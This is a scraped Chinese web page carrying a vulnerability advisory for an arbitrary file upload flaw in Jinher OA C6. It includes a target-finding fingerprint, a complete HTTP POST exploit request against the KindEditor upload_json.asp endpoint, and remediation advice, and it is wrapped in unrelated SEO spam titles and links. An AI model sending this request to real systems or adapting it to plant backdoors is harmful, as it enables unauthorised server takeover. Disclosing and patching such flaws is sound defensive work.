当前位置: 首页 > news >正文

请问做网站怎么赚钱中资建筑信息平台

请问做网站怎么赚钱,中资建筑信息平台,成都软件培训机构排名榜,渝快办官网产品介绍 金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。 漏洞概述 金和 OA C6 upload_json接口处存在任意文件上传漏洞#xff0c;攻击者可以通过构造特殊请求包上…产品介绍 金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。 漏洞概述 金和 OA C6 upload_json接口处存在任意文件上传漏洞攻击者可以通过构造特殊请求包上传恶意后门文件从而获取服务器权限。 资产测绘 app“Jinher-OA” 漏洞复现 POST /c6/KindEditor1/asp/upload_json.asp?dirfile HTTP/1.1 Host: your_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Length: 369 Accept: */* Accept-Encoding: gzip, deflate, br Connection: close Content-Type: multipart/form-data; boundary---------------------------494407267900182071383631703039-----------------------------494407267900182071383631703039 Content-Disposition: form-data; namelocalUrl-----------------------------494407267900182071383631703039 Content-Disposition: form-data; nameimgFile; filenamevae.txt Content-Type: image/pngvae -----------------------------494407267900182071383631703039-- 访问打码的路径访问上传文件 成功上传借此可以上传任意文件。 修复建议 1、升级到安全版本 2、如非必要禁止公网访问该系统。 3、设置白名单访问。
http://www.dnsts.com.cn/news/181226.html

相关文章:

  • 农业营销型网站源码网站建设资金投入
  • 网站代理公司wordpress 生命周期
  • 做团购网站多少钱长沙建站公司哪有
  • 山东省建设执业官方网站上海贸易公司有哪些
  • 网站建设的针对对象阿里巴巴官网首页下载
  • 动易网站搜狗推广管家下载
  • 旅游攻略网站开发背景苏州网站开发建设方案
  • 网站域名登记证明文件域名邮箱如何注册
  • 做算法题网站上海大型广告公司排名
  • 池州微信网站建设河南焦作有做网站开发的公司吗
  • wordpress点击量最多的文章爱站网seo培训
  • 提供网站推广公司电话wordpress 安卓 生成
  • 运动鞋子网站建设规划书麻栗坡网站建设
  • 棋牌类网站设计建设帮企商城源码
  • 免费建立一个个人网站广东省建设信息港网站
  • 户县微网站建设电子个人简历手机版免费
  • 公司建设网站的好处网站后台管理界面下载
  • 怎样做网站标题优化网站后台首页设计
  • seo建站营销手游代理
  • 唐山网站建设策划网站建设需要哪些证
  • 潍坊网站建设尚荣微网站建设多少钱
  • c2c代表网站是什么用子域名安装wordpress
  • 中国代理网官方网站兼职做一篇微信的网站
  • 模板建网站多少钱济南高端定制网站建设
  • 网站建设教程 mysqlh5前端开发
  • 阿里云网站商城建设医疗网站模版
  • 网站建设内容策划福州seo推广服务
  • 永安市建设局网站石家庄专门做网站的公司
  • 深圳营销型网站设计公司建设集团网站的作用
  • 沈阳网站建设渠道磁力天堂